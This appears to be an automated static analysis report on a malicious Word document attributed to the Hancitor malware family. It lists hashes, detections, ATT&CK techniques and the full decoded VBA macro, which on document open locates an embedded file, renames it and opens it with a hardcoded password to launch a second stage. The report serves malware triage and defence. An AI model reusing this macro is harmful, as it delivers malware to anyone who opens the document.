Hancitor — Office (OLE) malware analysis

Static analysis result for SHA-256 1835e00015a72e81…

MALICIOUS

Office (OLE)

534.5 KB Created: 2021-10-19 14:09:00 Authoring application: Microsoft Office Word First seen: 2021-11-02
MD5: 1d6dfb73231da40c6d151d2e8680fb47 SHA-1: 9193f24d93861a24cdf7ff2772b3105b368102ac SHA-256: 1835e00015a72e819616c01893e9b4d6c8cc7b99bcb6dd4fb4e68ab3a9e3c091
132 Risk Score

Malware Insights

Hancitor · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that executes a Document_Open subroutine. This subroutine attempts to download and execute a second-stage payload, likely a DLL, by constructing a path to 'zo.dll' and opening it with a password. The ClamAV detection and the presence of a Document_Open macro strongly suggest the Hancitor family, which is known for macro-based downloaders.

Heuristics 6

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Downloader.Hancitor10210-9903725-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Hancitor10210-9903725-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3628 bytes
SHA-256: 0f66e8b0976dfa1fe567b1dc29fee8e23ed085308518898b6cdda18441ac4ff8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  
     
     Dim lds As String
        Dim vssfs As String
Private Sub Document_Open()
Dim dfgdgdg
Call s1("L")

Dim fds, fdsa As String
fds = "\"
 fdsa = ".d"
Call s2("ocal/")
Call ass
Call acc
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)
fds = kytrewwf & fds
If Dir(fds & "zo" & "ro" & fdsa & vssfs) = "" Then
Dim mySum
mySum = Application.Run("ppl")

If Len(lds) > 2 Then


Call nam(lds, kytrewwf)
Call pppx(fds & "zo" & "r" & "o" & fdsa & vssfs)




End If
End If
End Sub

Sub plof(kl As String)
lds = kl
End Sub
Sub ass()
vssfs = "o"

End Sub
Sub acc()
vssfs = vssfs & "c"
End Sub

Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), lds)

End Sub





Attribute VB_Name = "Module1"
Dim vcxz

Sub pppx(pili As String)
Call oicx(pili)

    Documents.Open FileName:=vcxz, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="doyouknowthatthegodsofdeathonlyeatapples?", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub

Sub oicx(iii As String)
vcxz = iii
End Sub






Attribute VB_Name = "Module3"

Sub bvxfcsd(tini As String)

 Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2

    Selection.TypeBackspace

Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)

    ntgs = 50
sda = 49


While sda < 50
      ntgs = ntgs - 1
  
      If Dir(Left(uuuuc, ntgs) & tini, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & tini)
End Sub









Attribute VB_Name = "Module123345"
Dim pls As String


 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

    Dim Ters As Object


For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc

   For Each Ters In mds.Files
   
   If Ters.Name = "zoro.kl" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub




Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)


Dim oxl
oxl = "\zo" & "ro." & "d"
oxl = oxl & "o"
oxl = oxl & "c"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub

Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub












Attribute VB_Name = "Module2"
Dim mgf, uhjknb, wers, qweds, fafaa As String
Dim ocm As String

Sub s1(vi As String)
mgf = vi
End Sub
Sub s2(vi As String)
uhjknb = vi
End Sub
Sub s3(vi As String)
wers = vi
End Sub


Sub ppl()
Dim mfd As String
mfd = "e"
wers = "T"

Dim poidds As String
Dim ugfc As String
ugfc = "p"
qweds = "m"


poidds = mgf & uhjknb & "" & wers & mfd & qweds & ugfc
Dim lklc As String
lklc = poidds
Call bvxfcsd(lklc)
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1696132553/Ole10Native 349987 bytes
SHA-256: 9568e0188f482ae50396bc8caaf09c86bdcb4599d6fa54b07a0a6268a6e9fce6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
ole10native_00_zoro.kl ole-package-payload OLE Ole10Native payload: ObjectPool/_1696132553/Ole10Native; display_name=zoro.kl; full_path=C:\Users\kell\AppData\Local\Temp\zoro.kl; temp_path=; def_file= 349696 bytes
SHA-256: dd891db0c9eed71e1f6e2f659a9b7dc18806626480f36b1e84ef18f41cd6a57d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.